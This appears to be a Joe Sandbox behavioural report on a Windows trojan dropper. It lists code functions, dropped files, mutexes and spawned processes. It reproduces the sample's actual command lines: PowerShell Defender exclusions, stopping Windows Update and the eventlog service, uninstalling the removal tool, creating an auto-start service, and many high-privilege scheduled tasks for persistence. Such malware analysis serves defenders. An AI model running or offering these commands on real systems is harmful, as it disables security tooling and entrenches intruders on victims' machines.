Source: C:\Windows\System32\conhost.exe	Code function: 7_2_000001B0BB98DCE0	7_2_000001B0BB98DCE0
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_000001B0BB9944A8	7_2_000001B0BB9944A8
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BA90D7C	8_2_00007FFD9BA90D7C
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BC56BFB	8_2_00007FFD9BC56BFB
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BC55377	8_2_00007FFD9BC55377
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BC462F3	8_2_00007FFD9BC462F3
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BC554FA	8_2_00007FFD9BC554FA
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BC43CE9	8_2_00007FFD9BC43CE9
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BC40CAF	8_2_00007FFD9BC40CAF
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 9_2_00000216D26C1F2C	9_2_00000216D26C1F2C
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 9_2_00000216D26D38A8	9_2_00000216D26D38A8
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 9_2_00000216D26CD0E0	9_2_00000216D26CD0E0
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 9_2_00000216D26F2B2C	9_2_00000216D26F2B2C
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 9_2_00000216D27044A8	9_2_00000216D27044A8
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 9_2_00000216D26FDCE0	9_2_00000216D26FDCE0
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Code function: 20_2_00007FFD9BAC0D7C	20_2_00007FFD9BAC0D7C
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Code function: 20_2_00007FFD9BC85377	20_2_00007FFD9BC85377
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Code function: 20_2_00007FFD9BC854FA	20_2_00007FFD9BC854FA
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Code function: 20_2_00007FFD9BC73CE9	20_2_00007FFD9BC73CE9
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Code function: 20_2_00007FFD9BC70CAF	20_2_00007FFD9BC70CAF
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Code function: 26_2_00007FFD9BAA0D7C	26_2_00007FFD9BAA0D7C
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E90538A8	38_2_00000150E90538A8
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E904D0E0	38_2_00000150E904D0E0
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E9041F2C	38_2_00000150E9041F2C
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E93F44A8	38_2_00000150E93F44A8
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E93EDCE0	38_2_00000150E93EDCE0
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E93E2B2C	38_2_00000150E93E2B2C
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000267FCE61F2C	40_2_00000267FCE61F2C
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000267FCE6D0E0	40_2_00000267FCE6D0E0
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000267FCE738A8	40_2_00000267FCE738A8
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000267FCE92B2C	40_2_00000267FCE92B2C
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000267FCE9DCE0	40_2_00000267FCE9DCE0
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000267FCEA44A8	40_2_00000267FCEA44A8
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B4F1F2C	45_2_000002359B4F1F2C
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B4FD0E0	45_2_000002359B4FD0E0
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B5038A8	45_2_000002359B5038A8
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B53AEC2	45_2_000002359B53AEC2
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B522B2C	45_2_000002359B522B2C
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B52DCE0	45_2_000002359B52DCE0
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B5344A8	45_2_000002359B5344A8
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B53A922	45_2_000002359B53A922
Source: C:\Windows\System32\dialer.exe	Code function: 46_2_000000014000226C	46_2_000000014000226C
Source: C:\Windows\System32\dialer.exe	Code function: 46_2_00000001400014D8	46_2_00000001400014D8
Source: C:\Windows\System32\dialer.exe	Code function: 46_2_0000000140002560	46_2_0000000140002560
Source: C:\Windows\System32\winlogon.exe	Code function: 49_2_00000225DC611F2C	49_2_00000225DC611F2C
Source: C:\Windows\System32\winlogon.exe	Code function: 49_2_00000225DC61D0E0	49_2_00000225DC61D0E0
Source: C:\Windows\System32\winlogon.exe	Code function: 49_2_00000225DC6238A8	49_2_00000225DC6238A8
Source: C:\Windows\System32\winlogon.exe	Code function: 49_2_00000225DC642B2C	49_2_00000225DC642B2C
Source: C:\Windows\System32\winlogon.exe	Code function: 49_2_00000225DC64DCE0	49_2_00000225DC64DCE0
Source: C:\Windows\System32\winlogon.exe	Code function: 49_2_00000225DC6544A8	49_2_00000225DC6544A8

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\IkSFhrpY.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: String function: 00D6EB78 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: String function: 00D6F5F0 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: String function: 00D6EC50 appears 56 times

Sample file is different than original file name gathered from version info

Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe, 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Source: hyperProviderSavesinto.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: KZcLqgnLvRf.exe.8.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RuntimeBroker.exe.8.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: KZcLqgnLvRf.exe0.8.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: KZcLqgnLvRf.exe1.8.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.adwa.evad.winEXE@77/37@0/1

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Code function: 0_2_00007FF7F4D63BF8 GetLastError,FormatMessageW,LocalFree,

0_2_00007FF7F4D63BF8

Source: C:\Windows\System32\dialer.exe

Code function: 46_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,

46_2_000000014000226C

Source: C:\Windows\System32\dialer.exe

Code function: 46_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,

46_2_00000001400019C4

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Code function: 0_2_00007FF7F4D7C220 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00007FF7F4D7C220

Source: C:\PerfDll\hyperProviderSavesinto.exe

File created: C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe

Jump to behavior

Source: C:\PerfDll\hyperProviderSavesinto.exe

File created: C:\Users\user\Desktop\msAjSsFc.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1516:120:WilError_03
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\5ca49a59652f7149b9095204d2006cefde527ed294d5ef6eecd72eab40b4b978
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_7103562

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PerfDll\vvkzdvmSUM14jiAzc.bat" "

Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Command line argument: sfxname	1_2_00D6DF1E
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Command line argument: sfxstime	1_2_00D6DF1E
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Command line argument: STARTDLG	1_2_00D6DF1E

Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	ReversingLabs: Detection: 60%
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Virustotal: Detection: 69%

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

File read: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe "C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe"
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Process created: C:\Users\user\AppData\Local\Temp\GargantuaN.exe "C:\Users\user\AppData\Local\Temp\GargantuaN.exe"
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Process created: C:\Users\user\AppData\Local\Temp\GargantuanS.exe "C:\Users\user\AppData\Local\Temp\GargantuanS.exe"
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe"
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PerfDll\vvkzdvmSUM14jiAzc.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\PerfDll\hyperProviderSavesinto.exe "C:\PerfDll/hyperProviderSavesinto.exe"
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 7 /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /f
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRf" /sc ONLOGON /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /rl HIGHEST /f
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 14 /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /rl HIGHEST /f
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Recovery\WmiPrvSE.exe'" /f
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe'" /f
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRf" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe'" /rl HIGHEST /f
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe'" /rl HIGHEST /f
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Recovery\RuntimeBroker.exe'" /f
Source: unknown	Process created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe"
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe"
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 8 /tr "'C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRf" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe'" /rl HIGHEST /f
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 11 /tr "'C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sB1sK52ORC.bat"
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "IFAYFBKT"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "IFAYFBKT" binpath= "C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe" start= "auto"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "IFAYFBKT"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Process created: C:\Users\user\AppData\Local\Temp\GargantuaN.exe "C:\Users\user\AppData\Local\Temp\GargantuaN.exe"	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Process created: C:\Users\user\AppData\Local\Temp\GargantuanS.exe "C:\Users\user\AppData\Local\Temp\GargantuanS.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "IFAYFBKT"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "IFAYFBKT"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PerfDll\vvkzdvmSUM14jiAzc.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\PerfDll\hyperProviderSavesinto.exe "C:\PerfDll/hyperProviderSavesinto.exe"	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sB1sK52ORC.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: version.dll	Jump to behavior
